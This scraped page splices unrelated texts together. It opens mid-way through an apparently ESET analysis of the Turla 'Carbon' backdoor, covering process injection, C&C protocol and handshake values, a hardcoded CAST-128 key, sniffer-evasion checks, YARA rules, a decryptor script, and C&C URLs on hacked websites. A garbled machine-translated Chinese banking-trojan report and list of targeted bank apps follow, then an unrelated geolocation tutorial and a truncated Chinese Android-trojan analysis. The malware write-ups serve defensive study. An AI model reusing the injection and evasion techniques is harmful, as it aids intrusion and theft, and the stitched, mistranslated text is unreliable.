A service that ensures Carbon’s persistency is created. Its name can either be “srservice”, “ipvpn” or “hkmsvc” depending of the operating system version running on the compromised machine.

The Carbon working directory is retrieved by walking through the “%windir%\inf” folder and looking for the file that contains the Carbon base path.

Last but not least, the function “ModuleStart” (in Carbon 3.71) or “ModStart” (since Carbon 3.77) from the orchestrator (located in the Carbon base folder) is called.

Orchestrator

The orchestrator is the main component of the Carbon framework. It is mainly used to inject code into a process that communicates legitimately over the Internet and to dispatch the tasks received from the injected library to other computers on the same network either through named pipes or TCP.

Seven threads are created by the malware. It is easy to identify Carbon’s characteristics because each thread has a specific role:

Configuration fetching

Because the configuration file can be updated by the malware, some attributes like the C&C server addresses are monitored every 10 minutes.

Check Carbon storage folder periodically

There is a storage folder located in the Carbon working directory. This folder contains some files downloaded from the C&C server (tasks that are either commands to be executed or PE files, and their configuration files).

This thread will run continuously and check every two hours[5]whether there is still enough space available in this folder; if not, a notification is written into the logfile.

Task execution

The execution of the tasks in the context of the orchestrator process is very similar to the way in which it is performed in the communication library (cf Communication library / Tasks execution).

Unlike the communication library, it is the file “encodebase.inf” (for Carbon v3.8x) or “a67ncode.ax” that contains the list of the tasks to execute.

Each line of this file is composed in the following way:

  • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | [execution_mode | username | password]

The five first fields are required, while the last three are optional. If the field “execution_mode” exists, its value will affect the way the task is executed:

  • 0 or 1: normal execution
  • 2: the task is executed in the security context of a specific user (credentials are provided through the username/password fields)
  • 3 or 4: the task is executed in the security context of the user represented by the “explorer.exe” token

P2P

Like Uroburos/Snake, Carbon can dispatch tasks to other computers from the same network via named pipe or TCP. It is useful to be able to dispatch and execute tasks on computers that do not have Internet access.

Communication channels

Uroburos used several types of communication transports than can be categorized as follows:

  • type 1: TCP
  • type 2: enc, np, reliable, frag, m2b, m2d
  • type 3: t2m
  • type 4: UDP, doms, domc

Carbon uses a reduced number of communication channels:

  • type 1: TCP, b2m
  • type 2: np, frag, m2b

The data sent to peers are usually fragmented and transported either by TCP or via a named pipe. If, for example, fragmented data are sent from a computer to another one by a named pipe, an object “frag.np” is set up. In this case the mother class “frag” constructor will be called followed by a call to the constructor subclass “np”.

There is a structure composed of several handlers for each objects: initialize communication, connection (to a pipe / IP address), read data, send data etc.

How a task is forwarded to another computer

Several steps are performed to send data from one computer to another:

  • a communication channel is created (frag.np or frag.tcp object) with a specific named pipe / ip address
  • options are given to the object communication (for example : the fragment’s size, information about the peer etc.)
  • connection to the peer
  • an authentication step is performed between the host and the peer:
    • there is a handshake process where the host is sending the “magic” value “A110EAD1EAF5FA11” and expects to receive “C001DA42DEAD2DA4” from the peer
    • a command “WHO” is sent to the peer where the host sends the victim uuid and expects to receive the same uuid
  • if the authentication was successful, the data are sent to the peer

All the communication between the host and the peer are encrypted with CAST-128

Note that this P2P feature is also implemented in the communication DLL.

Plugins

This malware supports additional plugins to extend its functionalities.

In the configuration file, there is a section named “PLUGINS”. It might not exist when the configuration file is dropped from the loader resources but this file can be updated by the malware. The section “PLUGINS” contains a line formed this way:

  • %plugin_name%=%enabled%|%mode%[:%username%:%password%]|%file_path%

%file_path% can be either the path to a PE file or to a file containing a command line to be executed. %enabled% is a string that is used to know if the plugin has to be executed. If it is the case, that string value is “enabled”.

The attribute %mode% is used to control the context in which to execute the PE file/command line. It can be either:

  • 1 = execution with current user privilege in the current process context through CreateProcess().
  • 2 = execution as the user specified in the configuration (:%username%:%password% attributes), the token of this specific user is retrieved through the LogonUserAs() function.
  • 3 = execution in the security context of the user represented by the “explorer.exe” token (the token of the process “explorer.exe” is duplicated and passed through the CreateProcessAsUser() function.
  • 4 = similar than 3 but the environment variables for the user represented by the “explorer.exe” token are retrieved and passed to the function CreateProcessAsUser()

If it is a PE file:

  • the file is loaded into the malware process memory
  • the module is parsed to check if it is a DLL
  • if the module is a DLL and exports a function “ModStart” (since Carbon 3.77) or “ModuleStart” (for older versions of Carbon), a new thread is created to execute this function.
  • if the module is not a DLL but a valid PE, it is executed from the entry point.

Injection of the communication library into remote processes

The library that is used to communicate with the C&C server is injected into remote processes. In order to know where to inject this DLL, the configuration file is parsed. The section “[NAME]” contains a field “iproc” containing a list of processes that can legitimately communicate to Internet.

Example:
[NAME]iproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exe

For each process on the list that is running on the system, if its parent process name is either “explorer.exe” or “ieuser.exe”, the DLL will be injected into this process.

The process injection is very classical:

  • the functions “CreateToolHelp32Snapshot / Module32FirstW / Module32NextW” are used to retrieve the base address of the module “kernel32.dll”
  • the module EAT is parsed to get the address of the function “LoadLibraryW”
  • the privilege “SeDebugPrivilege” is enabled for the current process
  • memory is allocated into the remote process and the library path is written into it
  • NtCreateThreadEx or CreateRemoteThread (if the address of the first function cannot be retrieved) is called to execute LoadLibraryW to load the DLL into the memory of the remote process *

Communication library

The following analysis is based on the version 4.x of msximl. This component may have changed in the latest versions.

Configuration fetching

Besides the code in the “Configuration fetching” thread from the orchestrator (which is similar), a field “sethttp1” is retrieved from the [TRANSPORT] section.

If this value is set, HTTP 1.1 will be used for future connections.

Tasks execution

The tasks are retrieved from the C&C server.

The tasks to be executed by the communication library are listed in the file “b9s3coff.ax” (for Carbon v3.7x) or “cifrado.xml” (for Carbon v3.8x).

Each line of this file is composed in the following way:

  • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath

The task file and its config are decrypted (CAST-128) and the task executed. There are some options that are retrieved from the Carbon configuration file: “time2task” is used to set a timeout for the task execution (1 hour by default) while “task_min” and “task_max” are used as to wait a random time between the execution of the tasks on the task list (the random time will be set between “task_min” and “task_max”). These parameters come from the section [TIME].

If the task is a valid DLL file, it is loaded in the current process memory and a new thread is created to execute its “start” export. Otherwise, this is probably a command to execute. In this case, the configuration file is parsed. Like the Carbon configuration file, the task configuration file is formed as a windows “inf” file and should contain a section [CONFIG] with the following parameters:

  • [CONFIG]
    • NAME (“cmd.exe” by default)
    • ARG
    • RESULT (“stdout” by default)
    • COMPRESSION (“yes” by default)
    • DELETE (“no” by default)

The command with its arguments is executed through CreateProcess() function and the results are stored in the %task_result_filepath% file if the RESULT option is not set to “stdout”, while error or additional info are added to the task logfile.

If the option RESULT is set to stdout:

  • the result task file is deleted and the task execution output is written to the log task file
  • the line “task_id | “1” | task_log_filepath | object_id” is added at the end of the file “C_56743.NLS” (Carbon 3.7x) or “dsntype.gif” (Carbon 3.8x)

Otherwise:

  • the task execution is outputted to the task result file and the errors / additional info to the task logfile
  • the line “task_id | “2” | task_log_filepath | task_result_filepath | object_id” is added at the end of the file “C_56743.NLS” (Carbon 3.7x) or “dsntype.gif” (Carbon 3.8x)

In both cases, the same line as written into “C_56743.NLS” is also written into the field “run_task” from the Carbon configuration file. It might be intended as a way for the malware authors to know which is the last task executed when the configuration file is sent to the C&C server (check “Configuration file backup”).

Log rotation

The logfile is backed up and sent to the C&C server periodically (by default this is done every two hours).

Like the backup of the configuration file, this action is performed only during specific times of the day.
Indeed, the log rotation will be performed only when the current local time is in the range of what is defined in the configuration file.

The fields “wh_min” and “wh_max” are retrieved from the [TIME] section of the configuration file (by default: 8 and 20). The thread will execute the code only if the current hour of the day is between %wh_min% and %wh_max%.

If there is a value for the attribute “timestop” from the [TIME] section (which looks like “wDay:wMonth:wYear:wHour:wMinute”), the thread will execute the code only after this specific datetime.

The attributes “lastsend” and “logperiod” from the [LOG] section are used to specify a delay time when to backup and send the log to the C&C server. (by default: every two hours).

A temporary file with a random name prefixed by “~D” is created in the folder “208” (for Carbon v3.7x) or “1033” (for Carbon v3.8x). The logfile content is copied into this new file. It is then compressed with Bzip2 and encrypted (CAST-128).

A new line is added at the end of the file “C_56743.NLS” (for Carbon v3.7x) or “dsntype.gif” (for Carbon v3.8x):

  • “10|1|%s|%s”
    • 1st field: an ID to identify the file as a logfile
    • 2nd field: 1 (file to be sent to the C&C server)
    • 3rd field: the temp file path
    • 4rd field: the victim uuid

Last but not least, the attribute “lastsend” is updated with the current time and the original logfile is deleted.

Communication with the C&C server

The code of this thread is used to retrieve new tasks from the C&C server, to send new files to the server (the files listed in the file “C_56743.NLS” / “dsntype.gif”) and to send the new tasks to the orchestrator.

First request

A random C&C server address is chosen from the ones in the section “CW_INET”. If the port and HTTP resource path are not specified, the default is to use port 80 and “/javascript/view.php”.

A user agent is set up in the following way:

  • the version of Internet Explorer is retrieved through the registry key: “HKLM\Software\Microsoft\Internet Explorer\Version” and is concatenated to the string “Mozilla/4.0 (compatible; MSIE %d.0; ”
    • example: “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0;”
  • concatenate the previous string with the OS major/minor version values (through GetVersionExA())
    • “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0; Windows NT 5.1; Trident/4.0”
  • enumerate the values key in “HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform” and concatenate each value to the previous string and then append a closing paren.
    • example: “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0; SLCC2)

The field “trans_timemax” from the section [TIME] is retrieved. It is used to set the timeout for internet requests (through InternetSetOption()). It has a value of 10 minutes by default.

A first GET request is performed on the root page of the C&C web server to check that the host is alive. If no packet capture is running on the system, a new request is done on the C&C server to check if new tasks are available. A “PHPSESSID” cookie is added to the request with the victim uuid as its value. A header “Referer” is added as well and set to the C&C server URL.

The malware is expecting to get an answer to the GET request similar to:

  • <input name=”%name%” value=”%data_in_b64%”>

If the field “value” contains something, a new task is available.

Send data to the server

If the file “C_56743.NLS” / “dsntype.gif” is not empty, it means there are data to be sent the C&C server. The file is parsed and the last line is retrieved. It contains details about the data to be sent. A data blob is built and each of the following fields is encrypted with CAST-128:

  • id | val | tmp_filesize | tmp_content | [OPTIONAL (if val == 2) tmp2_filesize | tmp2_content] | len_object_id | object_id
    • id = the type of data to send to the C&C server, it can be:
      • 10: log backup
      • 11: configuration file
      • 20: a cryptographic key
      • otherwise: an id associated to a task, it can be the result of a task or an error log in the case of task execution failure
    • val = 1 if there is only one file to send, 2 if there are two files
    • object_id = the victim uuid

If the field “dtc” from the section [CRYPTO] of the configuration file is set to 0, this whole blob is base64 encoded and sent to the C&C server through a POST request.

Otherwise, another layer of encryption is used. In this case, the data blob is signed and a random 3DES key is used to encrypt it. Because the 3DES key is randomly generated and the server needs it to decrypt the data, the key is encrypted with the server public key. The server key is retrieved from the field “publicc” of the section [CRYPTO] from the configuration file.

This new blob (encrypted_key | signature_data | encrypted data) is encoded in base64 and sent to the C&C server through a POST request.

In order to avoid detection based on the data size sent in a request, the blob can be fragmented into several packets. An option in the configuration file (“post_frag” in the section [TRANSPORT]) defines whether the blob will be fragmented or sent in only one POST request.

If this option is set to “yes”, the blob is divided into several fragments of a specific size. This size comes from another field in the configuration file: “post_frag_size”.

An additional header will be added to the request:

  • “Content-Range: bytes %u-%u/%u; id=%u\r\n”, i, i+(fragment_size-1), data_size, task_id”

If the option http11 is set, a specific header is added as well:

  • “Expect: 100-continue\r\n”

For each fragments sent, the fields “post_frag_size” and “pfslastset” from the config file (section [CW_INET_RESULTS]) are updated with the fragment size and the timestamp.

Get new tasks

New tasks are retrieved from the C&C server by parsing the html page. The malware expects to find the html tag <input> in the page with a base64 encoded blob in its “value” attribute. Once decoded, this blob contains:

  • an encrypted block of 128 bytes that contains a structure “PUBLICKEYSTRUC” followed by a cryptographic key (probably a 3DES key)
  • signature data (128 bytes) to verify the integrity of the next block
  • a block of encrypted data that contains the task

The malware uses an RSA private key (retrieved from the field “keypair” from the section [CRYPTO] of the configuration file) to decrypt the first block and then uses the freshly decrypted key to decrypt the third block. This block of data can be either:

  • a task to be executed[6]
    • the data are decrypted and stored in few temporary files, the task (a command or a PE file) and its configuration file in the “Nls” folder and the output files (file that will contains the task results and the logfile) are stored in the folder “0208” (or respectively “0409” and “1033” for Carbon v3.8x)
    • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath
    • this line is appended to beginning of the file “b9s3coff.ax” (cifrado.xml on v3.8x)
  • a task to be executed by the orchestrator[7]
    • the data are decrypted and stored in few temporary files (the task, its configuration etc) in the “Nls” and “0208” folder (or “0409” and “1033” for Carbon v3.8x)
    • depending of the content of the data, one of these lines will be added to the beginning of the file “a67ncode.ax” (encodebase.info on v3.8x)
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | execution_mode | username | password
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | execution_mode
  • a new RSA server public key
    • in this case, the configuration file is updated with the new key encoded in base64 (field publicc)
  • data to be sent to an instance of Carbon running in another computer in the same network
    • the data can contains a specific IP address and port, a named pipe or a named pipe with a username and password.

Check Internet availability

Each hour, the internet connection is checked. A first check is done by calling the function InternetAttemptConnect(). If it works, another test is done by sending HTTP GET requests to the following websites:

  • www.google.com
  • www.yahoo.com
  • www.bing.com
  • update.microsoft.com
  • windowsupdate.microsoft.com
  • microsoft.com

An event is used to notify the other threads in case of the loss of Internet access.

Configuration file backup

Similar to the logfile, the configuration file is also periodically backed up and sent to the C&C server. The thread executes the code in a specific range of time (between 8h and 20h by default)[8].

The value “configlastsend” is retrieved from the section [TIME] of the configuration file. If the config file has been sent over a month ago, the config file is copied into a temporary file with a random name prefixed by “~D” in the folder “208” (for Carbon v3.7x) or “1033” (for Carbon v3.8x). This file is then encrypted with CAST-128 algorithm.

To notify the thread that communicates with the C&C server that a new file is ready to be sent to the server, the following line is appending to the file “C_56743.NLS” (for Carbon v3.7x) or “dsntype.gif” (for Carbon v3.8x):

  • “11|1|%s|%s”
    • 1st field: an ID to identify the file as a config file
    • 2nd field: 1 (file to be sent to the C&C server)
    • 3rd field: the temp filepath
    • 4rd field: the victim uuid

Last but not least, the attribute “configlastsend” is updated with the current time.

Additional Notes

Calling API functions

The base address of the modules of interest are retrieved by either parsing the PEB or (if the modules are not loaded into the process memory) by loading the needed files from disk into memory and parsing their headers to get their base addresses.

Once the base addresses are retrieved, the PEB is walked again and the field “LoadCount” from the structure LDR_DATA_TABLE_ENTRY is checked. This value is used as a reference counter, to track the loading and unloading of a module.

If “LoadCount” is positive, the module EAT is parsed to get the needed function address.

Encryption

The module and function names are encrypted (at least since v3.77; it was not the case in v3.71) in a simple way, a logical shift of 1 bit being applied to each characters.

The processes’ names are encrypted as well by just XOR’ing each character with the key 0x55 (for Carbon v3.7x at least since v3.77) and with the key 0x77 for Carbon v3.8x.

With only a few the exceptions, each file from the Carbon working directory is encrypted with the CAST-128 algorithm in OFB mode. The same key and IV are used from the version 3.71 until the version 3.81:

  • key = “\x12\x34\x56\x78\x9A\xBC\xDE\xF0\xFE\xFC\xBA\x98\x76\x54\x32\x10”
  • IV = “\x12\x34\x56\x78\x9A\xBC\xDE\xF0”

Check if packet capture is running

Before communicating with the C&C server or with other computers, the malware ensures that none of the most common packet capture software is running on the system:

  • TCPdump.exe
  • windump.exe
  • ethereal.exe
  • wireshark.exe
  • ettercap.exe
  • snoop.exe
  • dsniff.exe

If any of these processes are running, no communication will be done.

Carbon IoCs are also available on ESET’s GitHub repositoryhttps://github.com/eset/malware-ioc/tree/master/turla

Appendices

Yara rules

import “pe”

rule generic_carbon
{
strings:
$s1 = “ModStart”
$s2 = “ModuleStart”
$t1 = “STOP|OK”
$t2 = “STOP|KILL”
condition:
(uint16(0) == 0x5a4d) and (1 of ($s*)) and (1 of ($t*))
}

rule carbon_metadata
{
condition:
(pe.version_info[“InternalName”] contains “SERVICE.EXE” or
pe.version_info[“InternalName”] contains “MSIMGHLP.DLL” or
pe.version_info[“InternalName”] contains “MSXIML.DLL”)
and pe.version_info[“CompanyName”] contains “Microsoft Corporation”
}

Carbon files decryptor/encryptor

carbon_tool.py

#!/usr/bin/env python2

from Crypto.Cipher import CAST
import sys
import argparse

def main():

parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(“-e”, “–encrypt”, help=”encrypt carbon file”, required=False)
parser.add_argument(“-d”, “–decrypt”, help=”decrypt carbon file”, required=False)

try:
args = parser.parse_args()
except IOError as e:
parser.error(e)
return 0

if len(sys.argv) != 3:
parser.print_help()
return 0

key = “\x12\x34\x56\x78\x9A\xBC\xDE\xF0\xFE\xFC\xBA\x98\x76\x54\x32\x10”
iv = “\x12\x34\x56\x78\x9A\xBC\xDE\xF0”

cipher = CAST.new(key, CAST.MODE_OFB, iv)

if args.encrypt:
plaintext = open(args.encrypt, “rb”).read()
while len(plaintext) % 8 != 0:
plaintext += “\x00”
data = cipher.encrypt(plaintext)
open(args.encrypt + “_encrypted”, “wb”).write(data)
else:
ciphertext = open(args.decrypt, “rb”).read()
while len(ciphertext) % 8 != 0:
ciphertext += “\x00”
data = cipher.decrypt(ciphertext)
open(args.decrypt + “_decrypted”, “wb”).write(data)

if __name__ == “__main__”:
main()

Open Source documentation

Carbon footprint

Table 2 – Carbon sample hashes
SHA1 hash
7f3a60613a3bdb5f1f8616e6ca469d3b78b1b45b
a08b8371ead1919500a4759c2f46553620d5a9d9
4636dccac5acf1d95a474747bb7bcd9b1a506cc3
cbde204e7641830017bb84b89223131b2126bc46
1ad46547e3dc264f940bf62df455b26e65b0101f
a28164de29e51f154be12d163ce5818fceb69233
7c43f5df784bf50423620d8f1c96e43d8d9a9b28
7ce746bb988cb3b7e64f08174bdb02938555ea53
20393222d4eb1ba72a6536f7e67e139aadfa47fe
1dbfcb9005abb2c83ffa6a3127257a009612798c
2f7e335e092e04f3f4734b60c5345003d10aa15d
311f399c299741e80db8bec65bbf4b56109eedaf
fbc43636e3c9378162f3b9712cb6d87bd48ddbd3
554f59c1578f4ee77dbba6a23507401359a59f23
2227fd6fc9d669a9b66c59593533750477669557
87d718f2d6e46c53490c6a22de399c13f05336f0
1b233af41106d7915f6fa6fd1448b7f070b47eb3
851e538357598ed96f0123b47694e25c2d52552b
744b43d8c0fe8b217acf0494ad992df6d5191ed9
bcf52240cc7940185ce424224d39564257610340
777e2695ae408e1578a16991373144333732c3f6
56b5627debb93790fdbcc9ecbffc3260adeafbab
678d486e21b001deb58353ca0255e3e5678f9614
Table 3 – C&C server addresses (hacked websites used as 1st level of proxies
C&C server address
soheylistore.ir:80:/modules/mod_feed/feed.php
tazohor.com:80:/wp-includes/feed-rss-comments.php
jucheafrica.com:80:/wp-includes/class-wp-edit.php
61paris.fr:80:/wp-includes/ms-set.php
doctorshand.org:80:/wp-content/about/
www.lasac.eu:80:/credit_payment/url/
Notes
5. two hours by default, but the waiting time depends of the field value “logperiod” from the “LOG” section of the configuration file
6. check “Tasks execution” part for more details
7. check “Orchestrator / Tasks execution” part for more details
8. depending of the config file, check “Log rotation” for the details

发布的Android恶意软件的源代码,用于运行银行僵尸网络

这个新的Android恶意软件银行最近发现在谷歌Play ESET发现再次在野外,更针对银行。这种表面的威胁进一步调查发现其代码中使用的是公开的几个月前的源代码建立。

检测由ESET作为trojan.android/spy.banker.hu的早期版本(1.1版–的源代码作者标记)和2月6日报道TH。恶意软件是通过谷歌游戏作为一个木马版本的一个合法的天气预报中的应用分布好天气。特洛伊目标22土耳其移动银行应用程序,试图收获凭据使用假冒的登录表单。此外,它可以被感染的设备远程锁定和解锁,以及拦截短信。

上星期日,我们发现在谷歌播放的版本新的木马,伪装成另一个合法的天气应用程序,这个时候世界天气。特洛伊,检测由ESET作为trojan.android/spy.banker.hw(1.2版),可在谷歌Play商店从2月14日TH直到被报道由ESET和拉从2月20日的商店TH

连接点

第二发现导致另一轮的调查,提供了一些有趣的启示。

事实证明,这些都是基于免费的Android木马的源代码是公开的在线。据称,从头写起,Android的恶意软件的“模板”代码,随着C&#38;C服务器–包括Web控制面板–已经在俄罗斯论坛自12月19日以来已可用的代码TH,2016

图1–源代码的Android恶意软件和C &#38; C在俄罗斯论坛公开

随后的调查带来的结果博士网络我们的关注,他们分析了一个恶意软件的早期的变种(由我们系统自12月26日检测TH2016,安卓/间谍。银行家HH)。

然而,这种变异并不直接连接到那些我们在谷歌播放找到,即使我们发现它同样检测名义下,版本1。我们能够确认这获得了僵尸网络的C&C服务器控制面板后,这是启动和运行,在我们调查的时间。通过控制面板,我们能够收集信息关于所有2800感染的僵尸网络恶意软件的版本。

图2–C &#38; C Web控制面板上市的恶意软件的受害者

下面是用户群体受到了恶意软件的概述,基于C和C控制面板中列出的僵尸网络数据:

有趣的是,C&C服务器本身,活动自2017年2月2日以来,已接近谁有网址,无需任何证件。

图3–调查时间表

它是如何运行的呢?

新发现的版本基本上相同的功能作为它的前身。在它的顶部采用了从原来的合法应用天气预报功能,trojan.android/spy.banker.hw能够锁定和解锁被感染的设备远程设置锁屏密码和短信拦截。

两者之间唯一的区别似乎是一个更广泛的目标群体–恶意软件现在影响69英国、奥地利用户,德国和土耳其的银行应用程序的–和更先进的混淆技术。

图4–谷歌恶意APP游戏

图5–绿色–合法世界天气图标;红–恶意版本

该木马还具有一个内置的通知功能,其目的只能验证访问C&C服务器后。原来,该恶意软件能够在受感染的设备显示假通知,提示用户启动一个应用程序在目标银行从各银行的一个“重要信息”的名义。通过这样做,在一个虚假的登录屏幕形式恶意活动触发。

图6–C &#38; C发送伪造的通知消息的受感染的设备

图7–假冒的银行应用程序通知从C&#38;C发送

我的设备被感染了?我怎么清理?

如果你最近从Play商店安装了一个天气应用程序,你可能要检查,如果你没有这一银行木马的受害者。

In case you think you might have downloaded an app named Weather, look for it under Settings -> Application Manger. If you see the app depicted in Fig. 8, and also find “System update” under Settings -> Security -> Device administrators (Fig. 9), your device has been infected.

清洁您的设备,我们建议你向一个移动安全解决方案,或者你可以手动删除恶意软件。

To manually uninstall the trojan, it is first necessary to deactivate its device administrator rights found under Settings -> Security -> System update. With that done, you can uninstall the malicious app in Settings -> Application Manger -> Weather.

图8:在应用程序管理器的木马

图9:恶意软件伪装成有源设备管理员在系统更新

如何保持安全

而这背后的僵尸网络攻击者的特定群体选择传播恶意软件的木马程序通过天气和目标列在文章底部的银行,没有保证的代码不是或不被用在别的地方。

记住,要坚持一些基本的原则来保护移动恶意软件很好。

虽然不是完美无瑕,谷歌Play也采用先进的安全机制,防止恶意软件了。这可能不会与其他应用程序商店或其他来源不明的情况下,选择谷歌官方Play商店尽可能。

而从Play商店下载,确保能在安装或更新知道应用程序的权限。而不是自动给一个应用程序的权限要求,考虑他们的意思是应用程序以及你的设备。如果任何事情了,读什么其他用户写在他们的评论和下载相应的反思。

运行你已经安装在您的移动设备后,请继续关注哪些权限和权利要求。一个应用程序不会运行没有高级权限,没有连接到其预定的功能可能是一个应用程序你不想安装在你的手机上。

最后但并非最不重要的,即使所有的其他方法都失败了,一个有信誉的移动安全解决方案,可以保护您的设备从活跃的威胁。

如果你想了解更多关于Android的恶意软件,看看我们的最新的研究在话题

你也可以阻止由ESET的站在今年的移动世界大会

样品

包的名字搞砸检测
goodish.weatherca2250a787fac7c6eef6158ef48a3b6d52c6bc4bAndroid / spy.banker.hh
goodish.weathera69c9bad3db04d106d92fd82ef4503ea012d0da9Android / spy.banker.hu
follon.weatherf533761a3a67c95dc6733b92b838380695ed1e92Android / spy.banker.hw

有针对性的应用

Android / spy.banker.hh和Android / spy.banker.hu:

com.garanti.cepsubesi
com.garanti.cepbank
com.pozitron.iscep
com.softtech.isbankasi
com.teb
com.akbank.android.apps.akbank _直接
com.akbank.softotp
com.akbank.android.apps.akbank _直接_片剂
com.ykb.androidtablet
com.ykb.android.mobilonay
com.finansbank.mobile.cepsube
finansbank.enpara
com.tmobtech.halkbank
biz.mobinex.android.apps.cep_sifrematik
com.vakifbank.mobile
com.ingbanktr.ingmobil
com.tmob.denizbank
tr.com.sekerbilisim.mbank
com.ziraat.ziraatmobil
com.intertech.mobilemoneytransfer.activity
com.kuveytturk.mobil
com.magiclick.odeabank

Android / spy.banker.hw:

com.garanti.cepsubesi
com.garanti.cepbank
com.pozitron.iscep
com.softtech.isbankasi
com.teb
com.akbank.android.apps.akbank _直接
com.akbank.softotp
com.akbank.android.apps.akbank _直接_片剂
com.ykb.android
com.ykb.androidtablet
com.ykb.android.mobilonay
com.finansbank.mobile.cepsube
finansbank.enpara
com.tmobtech.halkbank
biz.mobinex.android.apps.cep_sifrematik
com.vakifbank.mobile
com.ingbanktr.ingmobil
com.tmob.denizbank
tr.com.sekerbilisim.mbank
com.ziraat.ziraatmobil
com.intertech.mobilemoneytransfer.activity
com.kuveytturk.mobil
com.magiclick.odeabank
com.isis _ papyrus.raiffeisen _付费的_ eyewdg
at.spardat.netbanking
at.bawag.mbanking
at.volksbank.volksbankmobile
com.bankaustria.android.olb
at.easybank.mbanking
com.starfinanz.smob.android.sfinanzstatus
com.starfinanz.smob.android.sbanking
de.fiducia.smartphone.android.banking.vr
com.db.mm.deutschebank
de.postbank.finanzassistent
de.commerzbanking.mobil
com.ing.diba.mbbr2
de.ing_diba.kontostand
de.dkb.portalapp
com.starfinanz.mobile.android.dkbpushtan
de.consorsbank
de.comdirect.android
mobile.santander.de
de.adesso.mobile.android.gad
com.grppl.android.shell.bos
uk.co.bankofscotland.businessbank
com.barclays.android.barclaysmobilebanking
com.barclays.bca
com.ie.capitalone.uk
com.monitise.client.android.clydesdale
com.monitise.coop
uk.co.northernbank.android.tribank
com.firstdirect.bankingonthego
com.grppl.android.shell.halifax
com.htsu.hsbcpersonalbanking
com.hsbc.hsbcukcmb
com.grppl.android.shell.cmblloydstsb73
com.lloydsbank.businessmobile
uk.co.metrobankonline.personal.mobile
co.uk.nationwide.mobile
com.rbs.mobile.android.natwest
com.rbs.mobile.android.natwestbandc
com.rbs.mobile.android.rbsm
com.rbs.mobile.android.rbsbandc
uk.co.santander.santanderuk
uk.co.santander.businessuk.bb
com.tescobank.mobile
uk.co.tsb.mobilebank
com.rbs.mobile.android.ubn
com.monitise.client.android.yorkshire

HTML5定位的基本方法中国骇客云平台

地理位置(Geolocation)是 HTML5 的重要特性之一,提供了确定用户位置的功能,借助这个特性能够开发基于位置信息的应用。今天这篇文章向大家介绍一下 HTML5 地理位置定位的基本原理及各个浏览器的数据精度情况。

在访问位置信息前,浏览器都会询问用户是否共享其位置信息,以 Chrome 浏览器为例,如果您允许 Chrome 浏览器与网站共享您的位置,Chrome 浏览器会向 Google 位置服务发送本地网络信息,估计您所在的位置。然后,浏览器会与请求使用您位置的网站共享您的位置。

HTML5 Geolocation API 使用非常简单,基本调用方式如下:
if (navigator.geolocation) {
navigator.geolocation.getCurrentPosition(locationSuccess, locationError,{
// 指示浏览器获取高精度的位置,默认为false
enableHighAccuracy: true,
// 指定获取地理位置的超时时间,默认不限时,单位为毫秒
timeout: 5000,
// 最长有效期,在重复获取地理位置时,此参数指定多久再次获取位置。
maximumAge: 3000
});
}else{
alert(“Your browser does not support Geolocation!”);
}
locationError为获取位置信息失败的回调函数,可以根据错误类型提示信息:
locationError: function(error){
switch(error.code) {
case error.TIMEOUT:
showError(“A timeout occured! Please try again!”);
break;
case error.POSITION_UNAVAILABLE:
showError(‘We can\’t detect your location. Sorry!’);
break;
case error.PERMISSION_DENIED:
showError(‘Please allow geolocation access for this to work.’);
break;
case error.UNKNOWN_ERROR:
showError(‘An unknown error occured!’);
break;
}
}
locationSuccess为获取位置信息成功的回调函数,返回的数据中包含经纬度等信息,结合Google Map API 即可在地图中显示当前用户的位置信息,如下:
locationSuccess: function(position){
var coords = position.coords;
var latlng = new google.maps.LatLng(
// 维度
coords.latitude,
// 精度
coords.longitude
);
var myOptions = {
// 地图放大倍数
zoom: 12,
// 地图中心设为指定坐标点
center: latlng,
// 地图类型
mapTypeId: google.maps.MapTypeId.ROADMAP
};
// 创建地图并输出到页面
var myMap = new google.maps.Map(
document.getElementById(“map”),myOptions
);
// 创建标记
var marker = new google.maps.Marker({
// 标注指定的经纬度坐标点
position: latlng,
// 指定用于标注的地图
map: myMap
});
//创建标注窗口
var infowindow = new google.maps.InfoWindow({
content:”您在这里<br/>纬度:”+
coords.latitude+
“<br/>经度:”+coords.longitude
});
//打开标注窗口
infowindow.open(myMap,marker);
}
经过测试,Chrome/Firefox/Safari/Opera四个浏览器获取到的位置信息都是一摸一样的,估计都是用的同一个位置服务,数据如下:

而IE浏览器的和上面几款浏览器获取到的数据不一样,数据如下:

位置服务用于估计您所在位置的本地网络信息包括:有关可见 WiFi 接入点的信息(包括信号强度)、有关您本地路由器的信息、您计算机的 IP 地址。位置服务的准确度和覆盖范围因位置不同而异。

总的来说,在PC的浏览器中 HTML5 的地理位置功能获取的位置精度不够高,如果借助这个 HTML5 特性做一个城市天气预报是绰绰有余,但如果是做一个地图应用,那误差还是太大了。不过,如果是移动设备上的 HTML5 应用,可以通过设置 enableHighAcuracy 参数为 true,调用设备的 GPS 定位来获取高精度的地理位置信息。

[转载] Android 木马远控1.3(完整免杀进程植入版)

 

工具

ApkTool、dex2jar、DJ Java Decompiler分析必备

python2.6编写解密脚本

分析

这个样本通过捆绑软件SD-Booster来达到感染的目的,在安装运行被感染的SD-Booster时,木马就会自动安装进Android系统,为了尽快找到感染部分,下载未感染的SD-Booster进行反编译对比,结果如图 1所示:

 

图 1

程序被植入了“com.android.md5”与“com.gamex.inset”两个包,首先找到植入程序的加载处,在SDBoost类的onCreate()方法中插入了如下代码:

[Python] 纯文本查看 复制代码

?

1

2

3

4

5

public void onCreate(Bundle paramBundle) {

    super.onCreate(paramBundle);

    A.b(this);

    …

A是“com.gamex.inset”包中的类,A.b()方法代码如下:

[Python] 纯文本查看 复制代码

?

1

2

3

4

5

6

public static void b(Context paramContext)

  {

    context = paramContext;

